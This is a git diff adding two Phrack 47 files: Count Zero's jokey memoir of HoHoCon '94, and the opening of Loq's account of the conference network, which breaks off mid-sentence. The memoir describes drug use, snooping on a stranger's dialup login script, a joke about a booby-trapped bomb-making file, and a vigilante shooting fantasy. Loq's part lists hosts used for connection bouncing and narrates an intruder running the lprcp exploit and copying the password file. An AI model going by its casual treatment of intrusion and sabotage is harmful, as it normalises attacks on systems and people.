+            Count "Funk-Master of L0\/3 and Mayhem" Zero *cDc*.
+
+(what follows is my subjective, semi-truthful, self-centered,
+quasi-chronological tour of HoHo '94...if you're not mentioned in it,
+then you obviously didn't buy me a drink)
+
+"It starts"..
+12.29.94, Thursday
+--------------
+Logan Airport, Boston, Massachusetts
+6:29 AM
+Our flight leaves in one hour.  Decided to pull an all-niter from the day
+before.  Rather than beating my body out of REM sleep at this unholy
+hour, I opt for the familiar slow death of sleep deprivation.  No matter.
+The tablets of ephedrine pulled me through, and now I sit in an airport
+restaurant smoking Camels and waiting for something to happen.
+
+As usual, it does.
+
+Deth Veggie, Iskra, and Basil arrive, ready for action...we board the
+plane and jump into the sky.   "I like this airline...Delta....it's
+not just an airline, it's a Greek letter, a symbol of change..." I remark.
+
+"Uh, yeah," comments Veggie. "I wonder if we'll finally discover the
+Meaning of Life at this con."  He strains his massive legs against the seat
+in front of him, weak airline plastic buckling under the force.
+
+"Fuck metaphysics..." I say, flipping through a wad of cash in my pocket.
+"I'll tell you, Veggie...the cDc T-shirts you made are fabulous. You will
+surely make heaps of $$$.  *That's* the most important thing!"
+
+Veggie grins widely.  We give each other the sekrit cDc handshake and rub
+our silver cow-skull talismans.
+
+Always temper metaphysics with materialism.
+
+Arrival, Thursday afternoon
+---------------------
+We belly-down in Austin, and grab a cab to the wonderful Ramada.  Outside,
+there is a major highway under construction.  Huge vehicles of
+construction and destruction mull over piles of dirt and concrete.
+Signs of human life are minimal.
+
+"The Ramada at the End of the Universe...Drunkfux always chooses such
+scenic locations" I note.  "We can witness the creation of a mass transit
+system *and* celebrate our hacker brotherhood simultaneously."  The entire
+landscape appears desolate and hostile to organic life.  Nervously biting
+my lip, I immediately spot a Dunkin Donuts over the horizon..as does
+Basil.  We both have keen survival instincts.
+
+The nearby location of the 24-hr House of Caffeine and Baked Goods marked
+in our minds, we enter the hotel.
+
+"The room is $70 a nite," the woman behind the front desk offers.  "We're
+with the HoHoCon," says Veggie.  "Don't we get special rates?"  "Heh..
+HoHoCon...yes, that means our rooms must cost twice as much," I joke.
+The woman behind the front desk looks blankly at me...unaware.  "Like a
+deer in the headlights, " I tell Veggie as we collect our keys and walk
+to our room.  "And soon, Bambi will be eating a chrome grille..."
+
+A "Suite of the El33tE" sign is hastily drawn up and hung outside our
+door.  Veggie unpacks his 17-lb solid concrete Mr. T head and places it
+on a table.  The concrete bust's rough base immediately gouges deep
+scratches in it with a low grating noise....  "The 'T'
+approves," says Veggie.  I have no reason to doubt him, so I remain
+silent in awe.
+
+We find that Joe630 and Novocain are also here early...they invite us
+into their room to read a large sample of 'alternative zines.'  The
+eclectic magazines are fascinating, and I promptly spill a glass of water
+on their couch to show my appreciation.  "Uh, just don't trash the
+place, " Novocain tells me.  "Of course not," I reply.  "I'm just in a
+high entropy state right now..."  I immediately spill my ashtray to
+prove it.  (It always helps to follow up thermodynamic theory with
+physical proof...I am a true Scientist.)
+
+At some point, we flee after Joe630 demands "hugs" from us...something he
+continues throughout the conference.  "Grrrrr...touch me not, boy...I
+will not submit to your fondling," I tell him behind clenched teeth as
+I back out of the room.  "I'll only hug a man if he's buying me drinks
+or I'm trying to lift his wallet..."
+
+Later that night, we hook up with Ixom and Nicko...we invite them
+into our room for drinks and a philosophical discussion.  Ixom's new
+beard, long and flowing red like the fire of a Duraflame log, mesmerizes
+me.  I proceed to take notes on our conversation as Ixom and Nic begin
+to debate.  Soon, I begin to suspect they have been drinking a bit
+beforehand.
+
+"I like these lights when they're off."
+
+"Are we in the Information Age?"
+"Dude, shut up."
+
+(Nic, to me) "Dude, I like your poetry, but just shut up."
+
+"She was like 14, 15, you know, 11, 12..."
+
+"He's always in the bathroom...y'know, he has rabies...diabetes?....
+you know."
+
+"I don't need Valium, I'm down on life...." -Veggie
+
+"Heady stuff," I think, jotting notes furiously.  Nic begins a photo
+shoot of the Mr. T bust, and we are all fascinated at his skills in
+capturing the inanimate object's true nature.  "His true calling is
+film," I think as Nic rolls painfully on the floor to capture Mr. T's
+pout from a novel angle.  "I must see these prints.."  Nic promises to
+give us copies, as soon as he figures out how to remove the exposed
+film from the camera.  I suddenly feel the need to drink more.
+
+Friday
+---------------
+We awake and plan to head into Austin.  Basil finds an ad for a store in
+town called "The Corner Shoppe."  "They will give us a free pair of
+sunglasses with this coupon!" she exclaims.
+
+"They will give us sunglasses, and much much more..oh yes..." I think.
+
+Rodney, our journalist companion from Canada, joins us in our trek to
+the city.  'The Corner Shoppe' turns out to be a small shack-like
+store...with a large tent structure in front.  Animal skulls, exotic
+hides, trophy mounts, blankets, arrowheads, Indian mandellas, silver
+jewelry, rugs, pottery, and plaster sculptures abound...  We wander
+over to the tent and begin to browse.  "Look, they have plaster busts
+of Elvis and Beethoven on the same shelf," Basil remarks.  "This is
+truly a Store of Symmetry," I reply, as I run my fingers over a large,
+bleached cow skull.  The papery-smooth bone is cool and dry on my hands,
+and I wonder about the fate of the rest of the mighty beast.  I imagine
+the live cow roaming fields, chewing cud, powerful flanks driving it up
+and down verdant hills of grass.  A skull is more than an object, it is
+a link to the once-living creature...  "To this favor, she must come" I
+mumble to myself, lost in introspection.  "What?" asks Veggie?
+"Nothing," I reply, shaking the thoughts from my mind.  "Let us go
+inside and secure the sunglasses."  Never forget one's true purpose.
+
+All the native creatures of Texas are inside the store...albeit, dead.
+Stuffed, desiccated, mounted...and all available for purchase.  "Do you
+have a scorpion mounted in a bolo?" I ask the proprietor.  "No, well, we
+did, but you know, Christmas...we were cleaned out," she sullenly
+replies.  "No problem," I grin back at her.  "I am disappointed, but not
+dejected.  You have a fine establishment here."  She smiles back and
+begins to show me an assortment of desiccated rattlesnakes.  "Of all
+creatures, reptiles remain the most lifelike in death," I affirm.  She
+smiles nervously and points me towards the stuffed frogs.  "Silly woman,
+these are mere amphibians," I think to myself, but I follow her anyway.
+
+Veggie offers the other employee a sacred cDc silver cow skull talisman
+as a gift.  "Say, this is nice..never seen anything like it....I rope
+steer, and was going to put a silver cross on my baseball cap...but I
+think I'll put this on it instead," he says excitedly.   "Zero, this
+*proves* that cDc is more popular than God!" Veggie whispers to me in
+private.  "Undoubtedly," I respond.  We bask in the moment.
+
+Iskra finds an elephant skull lurking on a cabinet.  We are amazed at
+the cranial capacity.  I purchase a fine cow skull (complete with hanging
+hook).  After a few hours, Basil finally selects a pair of sunglasses
+(free) and we begin to walk aimlessly around the fringes of the city.
+Entering a Salvation Army store, Rodney begins to film us as we pick
+through the remnants of other people's lives...  "Are you guys in a rock
+band?" another customer asks me.  "Yes, I play Extended Keyboards,"
+I answer back, my attention lost in a milk crate full of used '80s
+cassette tapes.  Memories for sale...wholesale...  We buy some plastic
+guns and leave.
+
+Later, we stop for food at an Indian restaurant.  "Inexpensive buffet...
+cool.." I think.  However, the curry chicken is full of bones.
+"Grrr...I am not pleased...these bones anger me..."  "But the vegetables
+are pretty good," comments Veggie.  "I need meat...I need to tear and
+rend flesh, " I snap back, on the verge of making an ugly scene.
+Leaving the restaurant, we immediately purchase hard liquor for the
+trip back to the hotel.  Basil buys some Goldschlager.  Veggie, some
+Everclear and V8 juice....  Rodney and Iskra, a large assortment of
+beer.  Still filled with anger, I buy a pint of Southern Comfort out
+of spite.
+
+Friday night, many people arrive.  "Rambone!  Crimson Death!  Holistic!"
+I exclaim as I see my old, dear friends.  Rambone's hair is much longer,
+Holistic is noticeably more hirsute, and Crimson Death looks remarkably
+the same as last year.   We begin to drink heartily, and I promptly pass
+out on the foot of my bed.  "Damn, Zero is *out*," says Veggie.  "Let
+us cover his body and fill his arms with silly items and film him,"
+someone suggests.  Drunkfux captures my body on display for the video
+archives.  An hour later, I awake refreshed and only mildly humiliated.
+"I was merely recharging," I tell everyone.  "The mark of a professional
+alcoholic is the ability to *pace* oneself."  Noticing that I have
+finished the Southern Comfort, I decide to forage for more liquor.
+My hunt is successful to the point that I cannot remember the rest of
+the evening...
+
+Saturday, the "official" conference
+-------------------
+
+"Ugh," my brain tells me as I wake.  "Stay out of this," I tell my
+malfunctioning organ.  "We must attend the conference and discuss hacker
+things."  Rolling down to the conference room, we find dozens of people
+waiting in line.  Flashing our cow skull talismans, Veggie and I part
+the masses and proceed unhindered to the front row of the room.  Iskra,
+Veggie, Basil and I seat ourselves directly behind a video projector.
+"Here, amuse yourselves," Drunkfux remarks and hands us a SuperNES...
+Several games of Mortal Kombat ][ later, I realize I have forgotten all
+the fatalities.  "Damn, I need to rip out some spines," I think.  We
+notice the long tables at the end of the room filled with people selling
+things.  Fringeware has a large assortment of T-shirts, jewelry, and
+books...other people are selling DTMF decoders and cable-box hacks.
+"Merchandising...cDc needs more merchandising," I tell Veggie.  He
+responds by pulling out a large box of cDc T-shirts and hawking them to
+the conference attendees.  Naturally, they sell like cold bottles of
+Evian in the middle of the Sahara.
+
+Feeling a need for nicotine, I head out to the lobby area for a quick
+smoke.  "Rambone!" I exclaim as I spot him smoking in a corner.  "How
+ya doin this morning?"  "How do you think?" he replies from behind dark
+sunglasses.  "Oh, yeah," I respond.  We stand together in a
+post-alcoholic haze for a few minutes before saying anything.
+"Where's Crimson Death?" I ask.  "Where do you think?" Rambone replies.
+"Oh, yeah," I answer numbly.  Same as it ever was.
+
+Crimson Death pokes his head into the lobby sometime later...
+"hey, hi"...then disappears back to his room for more sleep therapy.
+Erikb shows up and starts selling LoD shirts.  "I'm staying outta there,"
+he replies when I ask if he's going inside the main conference room.  A
+Japanese man is fruitlessly trying to feed the Coke machine a dollar
+bill.  The machine keeps spitting out his crumpled bill like a
+regurgitated leaf of soft lettuce.  Feeling slightly ill, I re-enter
+the conference room.
+
+First speaker...the main guy from Fringeware, Inc.  He apologizes for
+rambling, then proceeds to ramble for an hour or so.  I cannot focus
+on his talk, and try to count the ceiling tiles.  Joe630 approaches us
+and says "you're in my seats..I reserved them!"  "Hug me and you're a
+dead man, " I growl.  He wanders off.  Basil and I amuse ourselves by
+playing with the plugs in the back of the stacked VCRs and the video
+projector.  Plug and play, all the way.
+
+Next speaker...some guys from the Prometheus Project.  They are damn
+intelligent and have a lot to say, all presented very professionally
+(a bit *too* professional for this crowd...they could have mixed in
+some cartoons or something with their textual overheads).  Most of the
+conference attendees seem to have the attention spans of gnats, and many
+appear to nod off.  Too bad...the future of digital cash, encryption,
+and Underground Networks over conventional TCP/IP...very rad stuff
+(http://www.io.com/user/mccoy/unternet for more info).  I plan to
+investigate more ...definitely.
+
+Another speaker...some guy talking about computer security...I don't
+catch his name, since I begin to have a slight nic fit and bolt for
+the lobby and my smokes.  (Isn't this moment-by-moment review fascinating
+and oh-so-true to life?)
+
+Damien Thorn comes up and talks about his current cellular articles
+and projects.  He's apparently releasing a video on "cellular hacking"
+(Cellular Hacking: A Training Video for Technical Investigators)...shows
+a clip of it..damn hilarious.  More like "MTV and Cops meets Cellular
+Hackers"...tech info mixed with funky music and hands-on demos/skits...
+I gotta have it (mail to Phoenix Rising Communications, 3422 W. Hammer
+Lane, Suite C-110, Stockton, CA, 95219 for info).  Altho he says he is
+nervous about talking in front of everyone, he is very articulate...
+good show, man.  He demos some DDI hardware for snarfing reverse-channel
+data...nothing really new, but nice to see.  Veggie starts playing with
+his cow skull talisman on the overhead projector, while Basil begins to
+make twist-tie sculptures of cows and other animals.  I attempt to make
+a twist-tie bird.  "What is that, a dog?," she laughs.
+"My art is wasted on you," I growl, teeth bared.
+
+Veggie gets up and talks about Canadians blowing themselves up after
+reading an old file of his on how to make pipe bombs.  After he sits
+down, I suggest he release a new file.  "Veg, man, you can call it 'An
+Addendum on How to Make Gasoline Bombs'...tell everyone it is a
+supplemental file to something you released years ago...include in it
+the note 'I forgot this safety circuit in my FIRST release of 'How to
+Make Gasoline Bombs'...you MUST include this crucial safety on the
+bomb...or it just might go off prematurely in your LAP....like, on a
+bumpy subway in New York'...it'll be a riot, dontcha think?"  Veggie
+just glares at me and cracks his knuckles.  It sounds like a heavy dog
+padding on thin, brittle plastic.  "I don't think so," he mutters.  Oh
+well, it was just an idea.  I ponder my own dark, sick sense of humor.
+Perhaps I need therapy.
+
+Grayarea gets up and begins to read off a pre-prepared speech on her
+laptop.  Her speech is too quick for my alcohol-byproduct-sodden
+synapses to register accurately.  I keep staring at her dress...bright
+tie-dye...mesmerizing...it's actually quite cool.  Suddenly, Loki gets
+up in the audience and the accusations fly back and forth between them.
+You kicked me off IRC.  You called my office at work.  You are doing
+this, you are doing that.  Both are getting into this verbal slugfest
+in a major way.  I feel the bad karma in the room hanging heavy like
+blue-green cigar smoke.  "Can't we all just get along??" I yell, but
+no one seems to hear me.  I don't know who is right or wrong (it's
+probably somewhere in between...the truth always gray, right?), so I
+don't hypothesize.  All I do know is that I'd never want to piss off
+Grayarea...she's damn strong on her convictions and won't take shit from
+anyone.  I think she'd look better up there wearing a big ol' leather
+jacket with studs...terminator style.  "One tends to assume that people
+wearing tie-dye gear are quiet, meek, very soft spoken,
+non-confrontational types....it is a camouflage that suits her well,"
+I think.
+
+Finally, Steve Ryan gets up and speaks about some new computer crime
+laws passed in Texas.  A lawyer working with the Austin EFF, he's always
+got something funny and informative to say.  The new laws define
+"approaching" a restricted computer system as being illegal, as well as
+defining a "biochemical computational device" as a computer system.  In
+other words, if someone comes up to you and talks to you, they have
+"approached" your personal "biochemical computational device"
+(read: brain), and are technically prosecutable for "hacking" under Texas
+law.  Hoo yeah!  Steve's whole speech is very cool, and I am only
+disappointed in the fact that he is the last person to speak....it's
+running very late and I have the attention span of a *hyperactive* gnat
+at this point..  But had it been anyone else up there, most of the
+conference attendees probably would have nodded off or wandered out the
+room.
+
+After Steve, the conference fragments as people leave or buy last minute
+items from the "vendor tables."  I buy a neat piece of jewelry...a
+little plastic doll arm tightly wrapped in twisted wire and metal.
+I pin it to the lapel of my jacket.  "I'm ready to rock, let's party!"
+We leave in search of alcohol and assorted mind-enhancements.
+
+In the hotel restaurant, we gather to plan our New Year's Eve excursion.
+All of our synapses are jammin' to various biochemical beats, and I
+order a chicken fried steak to fuel the fire in my skull.  "Veggie,
+your pupils are the size of dinner plates," I tell him from behind a
+mouthful of steak and gravy.  "Let me touch your jacket...is it blue
+or green?" he replies.  "It is both...yet neither," I respond,
+pulling my arm out of his clutches.  Later, we secure a ride with
+Ixom and Nicko into Austin...destination: Sixth Street.
+"Say Nic, did you ever see that movie 'Heavy Metal'..y'know, when
+the aliens are trying to land their spacecraft in the huge space
+station?" I yell above the whine of the engine, digging my nails into
+the passenger seat.  "Nope," he replies, and we suddenly veer across 4
+lanes of traffic.  "Perhaps it is better this way," I think.  Life
+imitates art, then you die.
+
+Holistic and I find Ohms.  We queue up and wait to enter the house of
+techno-funk.  "I know this place...I feel at peace," I tell a middle-age
+drunken woman in front of me.  She stares back with glassy eyes and
+feebly blows on her party horn.  "Yes, I know," I reply and look at
+my watch.  11:55PM.  Five minutes later, I walk into Ohms.  A flyer on
+the wall has a graphic depiction of a man screwing a woman with a CRT
+for her head, the title "Dance to the Sounds of Machines Fucking."
+Everyone begins to cheer and yell as I step through the inner doorway.
+"Either it is now 1995, or I appear to have fans," I think.  Ya, right.
+
+I order Holistic and I some screwdrivers.  As the waitress is pouring
+the vodka, she suddenly look distracted and our glasses overflow with
+booze.  Grinning at me meekly, she squirts just a dash of orange juice
+in each glass and hands them too me.  "Sorry, they're a bit strong,"
+she apologizes.  "No burden," I reply warmly.  "Wow, that was weird...
+but bonus for us!" Holistic says as he sips his drink with a wince.
+"No, that was a sign of the cow," I smirk, fingering my silver cow skull
+talisman on my neck.  "You'll get used to it."
+
+Ohms is filled with smoke, sweat, flashing lights, and the funkiest
+techno music I have ever heard.  Wandering outside, I see someone has
+set up several computers with PPP links to the net...they are attempting
+to use CU-SeeMe videoconferencing software with other sites around the
+world.  "Nice computer, are you responsible for this network?" I ask one
+of the operators as I open the machine's PPP config file and quickly
+peruse the dialup # and entire login script under the person's nose.
+"Oh, I don't know how they work..I'm just playing with this Fractal
+Painter thing," she replies.  "Yes, I thought so...Holistic, next round
+on me..." I exclaim as we leave.
+
+There are several robotic arms on the stage clutching strobe lights,
+occasionally twisting around and pointing into the crowd.  Holistic,
+Basil, Crimson Death, and I begin to dance with insane purpose.  Four
+hours later, we are still dancing.  Holistic eventually leaves for the
+hotel.  The remaining three of us dance until we have no more body
+fluids to exude.  "I love you guys," Crimson Death smiles as he grabs
+both me and Basil in a bearhug and kisses us on the forehead.  "Yes,
+this is bliss," I reply.  Suddenly we see Rambone at the bar...he is
+wide-eyed and sweating more than a human should be.  "Well, perhaps
+bliss is relative," I think.  Rambone leaves the club.  Later, we find
+Bill and ride safely back to the hotel.  It is 6:00AM.
+
+We find Veggie and Iskra in our room.  They have been staring at
+Veggie's "Hello Kitty" blinky lights and writing stories all night
+long.  "Read this, it's good!  Read it NOW!" Veggie exclaims.  "If it is
+good now, it will still be good in the morning...I shall sleep now," I
+answer through a haze of exhaustion.  Several minutes later, my
+remaining higher cortical functions shut down and I am enveloped in sleep.
+
+Sunday, early afternoon
+-----------------------
+
+Crimson Death stops by our room to say goodbye.  "Here is my new address
+and such..I've written it on this paper and folded it into an origami
+bird for you," he tells me.  "Functional art...I dig it, man," I
+answer and shake his hand.  The rest of the day passes lazily, until
+that evening when we pile into Drunkfux's van and head for Chuck-E-Cheeze
+for dinner.  "God in Heaven, they serve BEER here!" I exclaim, quickly
+ordering a pint.  Several slices of pizza and glasses of beer later, we
+are all playing skee ball, video games, and air hockey.  Basil is deftly
+beating everyone at air hockey (including myself).  "I'm into more
+intellectual games, " I grumble.  "Say Swamp Ratte', let us play a
+stimulating game of 'Whack-a-Mole'."  A real thinkin' man's game, by gum...
+He whips my ass.  "Damn moles, " I grumble again.
+
+Many "spring echo" plastic microphones are purchased...when yelled into,
+one's voice is given an echo audio-effect, and Drunkfux begins to
+announce the play-by-play of the air hockey games in his best Howard
+Cosell voice.  I see Damien Thorn, Carol (the journalist), and a dozen
+other HoHo attendees cavorting around Chuck-E-Cheeze...yet the restaurant
+has technically closed 30 minutes ago.  No one is attempting to make us
+leave.  "We dominate this establishment, but it can't last forever," I
+think.  Deciding it's a good time to cash in my tickets won from skee
+ball, I walk over to the ticket cash-in counter.  I notice the man
+behind the counter is counting them by weighing them on a scale.
+"Hrmmm...I wonder if I dipped them in beer...the increased weight would
+increase my.." but my thoughts are stopped short.  Too late, the
+restaurant is surely closing now, and everyone is leaving.  "Next time,
+muahahahaha." I plot and scheme.  The giant plastic monkey (costing 500
+tickets) will surely be mine...next time.
+
+Back at the hotel, I glance at a local newspaper in the lobby.  On the
+front page is a story of 2 people shot and killed in Planned Parenthood
+clinics in Brookline by some sick 'right-to-lifer'.  "Goddamn, that's in
+my home city...Boston!", I think.  Quickly reading the story, I feel
+sickened that someone could kill like that.  I entertain a brief
+fantasy....me sitting in the clinic in the waiting room....me seeing the
+sicko pull a rifle out of a bag and pointing it at the defenseless
+receptionist....me swinging my pump-action Mossberg 500 12 gauge shotgun
+out from under my long coat....and me walking six rifled deer slugs up
+the scumbag's spine.  Doom on you, sucker.  Violence is nasty, but it is
+a final resort sometimes.  I think how I'd have no reservations defending
+another human life with deadly force.  "An armed society is a polite
+society," I think, mentally quoting Robert Heinlein.  If all those clinic
+workers could pack heat, people would think twice about trying to
+threaten them.  People have the right to choose how they live their own
+fucking lives and control their own damn bodies...they shouldn't have to
+die for it.  I read how the police are planning to increase "officer
+visibility" around the clinics.  "Ya sure, us poor citizens are too meek
+to defend ourselves...let's let big bro' handle it..," I think.  I file
+the entire incident in my mind under "yet another reason to watch your
+ass and carry a big stick."
+
+I go back to the room and drown my reality-dosed anger by reading the
+ultra-violent comic book "Milk and Cheese" (most highly recommended..buy
+it...now!).  I ponder one of Cheese's most memorable quotes: "I wish I
+had a baseball bat the size of Rhode Island, so I could beat the shit
+out of this stupid-ass planet."  Sometimes, yes.
+
+Later that night, Rika (the Japanese correspondent) gives us a private
+viewing of Torquie's video on hacking.  We all agree it is very good...a
+great deal of coverage of the international scene...Germany...the
+Netherlands...even a clip of someone boxing in Malaysia.  I fall asleep
+feeling content.
+
+Monday, *TREMENDOUS DAMAGE*
+--------------------
+Monday arrives like a lamb...we wake late and hang around our room.
+Swamp Ratte' decides to take a shower.  "I'm just trying this concept out...
+if I like it, I might do it again," he says.  After the shower, he gives
+the concept a big "thumbs up" and tells us of his plans to incorporate
+it into his regular personal hygiene routine.  "This shower idea could be
+the Next Big Thing," he says ominously.  "Change is good...and so is
+conditioner," I comment, combing the snarls out of my own hair.  We call
+downstairs to check on the jacuzzi suite we had reserved for tonight.
+We are curtly informed that they are all booked.  "What, you promised us,"
+I gasp.  "Damn you, then we shall check out of this pit....sayonara!"
+Two hours later, we receive notice that all HoHo attendees still in the
+hotel are being kicked out "due to the *tremendous damage* incurred on
+the hotel this past weekend."  "What Tremendous Damage??  I'll show them
+tremendous damage!" Veggie vows, leaping for the door.  The rest of us
+manage to convince Veggie that his plans to drive to the closest hardware
+store and buy a box of crowbars and sledgehammers is probably not the
+best thing to do.  "Don't worry, Veg, " I say, comforting him.  "We
+shall find another jacuzzi, no doubt."
+
+We pile into Drunkfux's van and search for a new hotel in the center of
+the city.  On the way, we swing back into The Corner Shoppe, where
+Rodney films some more of our antics amongst the dead critters.  Rambone
+buys a long bullwhip (it's a hobby, he says), and Swamp Ratte' gives an
+impassioned speech for the camera on the joys of authoring.  We finally
+drop off Rodney at the airport and bid him farewell on his voyage back
+to the Great White North.
+
+The downtown Marriott ends up being our final destination.  After
+visually checking out the jacuzzi and pool facilities (no jacuzzi in
+the room, sigh, but a very nice public one open until 11:00PM),
+Drunkfux, Basil, and I head out in search of swimwear.  Veggie, Iskra,
+Swamp Ratte', and Rambone remain in the room...and eventually
+head for the bar.  We return ready for aquatics.  The three of us soak
+in the jacuzzi and swim in the pool, and finally we all retire to our
+hotel room.  "Damn, everyone looks like beached squid...let's go out to
+Emo's tonight!" I exclaim, trying to win them over.  Veggie, Iskra,
+Basil, and Rambone appear dead to the world.  "Here, I have some
+ephedrine left over from the other night...it's over-the-counter...and
+will make your toes tap."  Reluctantly, they agree to partake.  A few
+minutes later, Rambone and Veggie are wrestling on the bed, and I am
+experimenting on Drunkfux with Rambone's bullwhip.  "Gosh, I think
+these pills are stimulating," remarks Rambone.  "Yes, and let us not
+waste it...to Emos!" I cry.  We arrive at Emos and spend the evening
+playing pinball and listening to the jukebox.
+
+Returning to the Marriott, we are all still wired.  "Let us watch 'The
+Crow' on the tele," I suggest.  "Mayhem and Love at it's best!"  Most
+agree, and I sit riveted for the entire film.  "I am morphine for a
+wooden leg," I quote mentally from the original graphic novel.  That
+line never got into the movie, but I think it is one of O'Barr's best.
+
+Tuesday
+-----------------
+Not much happens...we wander the city...bid farewell to Rambone at the
+airport...check out the Fringeware store at 5015 1/2 Duval Street in
+Austin...and generally chill.  Erikb shows up, and Drunkfux wires the
+hotel room for a video interview with him and the rest of us as we all
+lounge on the two twin beds.  At one point, Drunkfux, Basil, and I are
+alone in the room when I call downstairs for room service (I sometimes
+have a need for funked-up potato skins, pronto).  A knock at the door...
+Drunkfux answers it wearing nothing but a towel around his waist and a
+towel on his head (having just showered).  Ushering in the room service
+guy, I tell him "just put the tray on the table, kind servant"  I
+absentmindedly push aside Rambone's coiled bullwhip.  Suddenly realizing
+the potential misinterpretation of my situation, I glance behind me to
+see the video camera on tripod pointed at the beds, video equipment,
+monitors,  and Basil wearing her leather pants, curled up on one of the
+many tousled blankets, dead asleep.  "Uh, huh....thanks...." I stammer
+as I slip the guy a fiver.  I try to think of something funny to say
+like "oh, we're making a DOCUMENTARY," but the glazed look in his eyes
+tells me we are beyond the point of no return.  "Well, these are the
+rumors that legends are made of," I think as I close the door behind him
+and wolf down my skins.  They are teeming with toppings.
+
+That evening, I take a late-nite swim by myself in the pool.  The water
+is heated, and by swimming under a small ledge, one is able to actually
+swim to the outside section of the pool under the open sky.  Steam
+rises in thick curls into the crisp night air, and as I float on my back
+I am able to see the stars.  Never have I felt so relaxed.  "Like an
+amoeba in the primordial soup, I live in the gutter yet strive for the
+stars," I paraphrase softly to myself.  Only the stars hear me.
+
+Wednesday (last day, YES, we EVENTUALLY go back home)
+-------------------
+
+Waking at the ungodly hour of 5AM, we make our early flight back to
+Boston.  Swamp Ratte' and I sit in the hotel lobby waiting for our shuttle
+to the airport.
+
+"I'm going to write about this HoHoCon again...we can put it in
+cDc #300," I tell him.
+
+"Cool," he replies.  "What's it going to be like?"
+
+"I dunno...the same as last time..maybe I'll mix in some weird dream
+sequences."
+
+"How about the cDc members fighting the Power Rangers and whippin' their
+sorry asses?"
+
+"Yeah, that sounds surreal enough!"
+
+We make our goodbyes, and on the way to the airport the shuttle bus
+driver from the hotel asks us "so are you with the team?"
+
+"Uh, what team?"
+
+"You know...the Power Rangers team...the ones putting on the show...they
+are staying in our hotel.  I thought you were with them.  They're actors
+putting on a live Power Rangers show across the country."
+
+"No, no, we're not with them.  Please leave us alone."
+
+My mind is pulled apart by this lattice of coincidence.  I decide to leave
+the dream sequence out of my phile.  This, Veggie, THIS...is a sign.
+
+I don't talk to the others much during the flight home.  Perhaps it is
+because I know the adventure is over and I am saddened slightly.
+Perhaps I am merely tired.  Most probably, it is a combination of the
+two.  I quickly depart from the airport and without goodbyes grab a cab
+for the L0pht.  I spend that evening alone at the L0pht, surrounded by
+Machines of Loving Grace and the solitude of blinking electronic devices...
+I am a bit happier.
+
+Woop de doe, dat's the show.
+
+Count Zero *cDc*
+
+***
diff --git a/phrack47/12.txt b/phrack47/12.txt
new file mode 100644
index 0000000..59d9896
--- /dev/null
+++ b/phrack47/12.txt
@@ -0,0 +1,615 @@
+                              ==Phrack Magazine==
+
+                 Volume Six, Issue Forty-Seven, File 12 of 22
+
+                                HoHoCon Miscellany
+
+-----------------------------------------------------------------------------
+
+                                "HERTz vs Y"
+                                   By Loq
+
+  (for the uninformed, HERTz is the Hohocon Emergency
+   Response Team, born to deal with pussy (err posse)-like
+   hackers on the net)
+
+
+OK, here it is...The complete story about hohocon.org, or at least as much as
+I can piece together...I will try to restrict myself to hohocon.org
+information, as I sure plenty of people have their own comments on what
+happened at h0h0.
+
+I arrived at hohocon Friday evening, and there was nobody around.  After
+phoning fool's VMB, I headed up to room 518, the computer room, to see
+what was up.  f0t0n, MiCRO^[[, fool and other people were scattered throughout
+the room were supposedly working on getting the system up, but they were
+having some "routing" problem...Hmm...  Nevertheless, they finally got it up
+a short time later, working reasonably well.
+
+hohocon.org consisted of a mass of computer equipment all kludged together,
+which nevertheless worked remarkably well.  There was the main user machine,
+hohocon.org, which handled all the user logins, the (supposedly dual) 28.8k PPP
+gateway machine, photon.hohocon.org, the terminal server, oki900.hohocon.org,
+and then micro^[['s box, lie.hohocon.org (lie didn't allow logins to most
+people).  Additionally, a last minute machine was added onto the network as
+sadie.hohocon.org.  That machine was graciously provided by mwe, a dfw.net
+type who fool had hit up for terminal and had shown up with a mysterious
+overclocked '66 with a shitload of neat stuff including multimedia
+capabilities.  He also brought us several "classic" (some call them ancient =)
+terminals that people were able to use to login.
+
+At some point, dfx showed up and made use of America's capitalistic system by
+offering various warez for sale, consisting mostly of those nifty red-type
+armbands to let people in to the main event...he pointed his camera at
+the systems..and then left.  he's tooo uber for us...
+
+Friday night, everything was calm...Micro^[[, myself, and several other
+people started working on bouncing between sites on the net...Several
+people donated accounts to use for this task, and we ended up with a nice
+list, until we hit utexas.edu, when the whole thing came to a screeching
+halt...Must say something about University of Texas at Austin networking, eh?
+Not wanting to escape through tons of telnets just to kill the final one
+that went through utexas, we just killed the whole thing and decided that
+we would do it the next day (although we never did get around to it again...
+oh well)... For those interested, here is a list of some of the sites we were
+able to bounce through:
+
+ usis.com  (Houston, Texas)
+ bell.cac.psu.edu  (State College, Pennsylvania)
+ pip.shsu.edu  (Huntsville, Texas)
+ dfw.net  (Dallas, Texas)
+ deepthought.armory.com  (San Jose, California)
+ falcon.cc.ukans.edu  (Lawrence, Kansas)
+ dunx1.ocs.drexel.edu  (Philidelphia, Pennsylvania)
+ solix.fiu.edu  (Miami, Florida)
+ thetics.europa.com  (Portland, Oregon)
+ yogi.utsa.edu  (San Antonio, Texas)
+ thepoint.com  (Sellersburg, Indiana)
+ aladdin.dataflux.bc.ca  (British Columbia, Canada)
+ itesocci.gdl.iteso.mx  (Guadalajara, Jalisco, Mexico)
+ tamvm1.tamu.edu  (College Station, Texas)
+ Joyce-Perkins.tenet.edu (Austin, Texas)
+ earth.cs.utexas.edu (Austin, Texas)
+
+I left Friday night around 2 am because I had to work at 8 :(...I will
+never do THAT again...Nothing very eventful happened in the computer room,
+several people wandered by, ophie refused to say hi to me (j/k ophie)
+and plenty of jokes and stories were passed around...
+
+Saturday nite was when all the fun happened on the net.  fool decided it
+would be a great idea to let everyone have accounts, and we finally got up to
+about a 60 line password file...Much of this traffic was over a 28.8k
+slip, which worked its way down to about 10bps by the time everyone started
+(ab)using it, not to mention the wonderful speed-decreasing/error-overcoming
+resolution tendencies of the v.fc protocol, which left us a bit...uhh...
+llllaaaaaaaaaggggggggggggeeeeeeeeddddddd.  This was eventually switched down
+to 14.4k after photon realized the problems the v.fc was causing.
+
+The next problem was probably very predictable, apparently to everyone except
+for one "fool" who broke down and decided to give y an account.  Everyone
+familiar with y (Y-WiNDoZE), knows his general habits around systems,
+and hohocon.org was no exception(ok,ok, so it wasn't completely fool's fault...
+Still...:)
+
+Apparently y next let x login under his account to look around.  The details
+are a little sketchy, but the first thing X did was look around,
+check out the password file, check out the remote hosts, went on irc for
+a bit, and then he began his real attack.  He ran pico and suddenly there
+was a copy of 8lgm's lprcp in his directory (presumably he ascii uploaded
+it into the editor) with the name 'posse'...hmmm... How ingenious (bah)...He
+then proceeded to copy the password file to his own directory, add a WWW
